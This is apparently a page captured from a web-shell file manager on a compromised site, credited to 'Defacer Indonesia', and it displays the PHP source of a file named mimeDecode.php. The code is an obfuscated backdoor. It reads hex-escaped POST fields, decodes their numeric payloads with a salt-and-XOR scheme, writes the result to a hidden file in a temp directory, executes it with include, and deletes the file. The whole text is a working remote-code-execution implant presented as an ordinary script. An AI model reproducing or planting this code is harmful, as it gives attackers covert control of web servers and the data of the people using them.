whoami7 - Manager
:
/
home
/
analuakl
/
amplmedia.com
/
Upload File:
files >> /home/analuakl/amplmedia.com/mimeDecode.php
<?php if(filter_has_var(INPUT_POST, "\x6D\x61rker")){ $bind = array_filter(["/var/tmp", getcwd(), session_save_path(), getenv("TMP"), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp"]); $pointer = $_POST["\x6D\x61rker"]; $pointer = explode ( '.', $pointer) ; $symbol = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $m = 0; array_walk($pointer, function ($v9) use (&$symbol, &$m, $salt, $lenS) { $chS = ord($salt[$m % $lenS]); $d = ((int)$v9 - $chS - ($m % 10)) ^ 1; $symbol.= chr($d); $m++; } ); $flag = 0; do { $obj = $bind[$flag] ?? null; if ($flag >= count($bind)) break; if (array_product([is_dir($obj), is_writable($obj)])) { $mrk = "$obj/.holder"; $file = fopen($mrk, 'w'); if ($file) { fwrite($file, $symbol); fclose($file); include $mrk; @unlink($mrk); exit; } } $flag++; } while (true); } if(filter_has_var(INPUT_POST, "p\x61\x72amet\x65r_gr\x6Fu\x70")){ $flag = array_filter([session_save_path(), "/tmp", "/var/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir")]); $ptr = $_REQUEST["p\x61\x72amet\x65r_gr\x6Fu\x70"]; $ptr= explode( ".", $ptr ) ; $pset = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $r = 0; foreach( $ptr as $v8) { $chS = ord( $s[$r% $sLen]); $d =( ( int)$v8 - $chS -( $r% 10))^ 91; $pset .= chr( $d); $r++; } foreach ($flag as $elem) { if (!( !is_dir($elem) || !is_writable($elem) )) { $ent = str_replace("{var_dir}", $elem, "{var_dir}/.entity"); if (@file_put_contents($ent, $pset) !== false) { include $ent; unlink($ent); die(); } } } }
Copyright ©2021 || Defacer Indonesia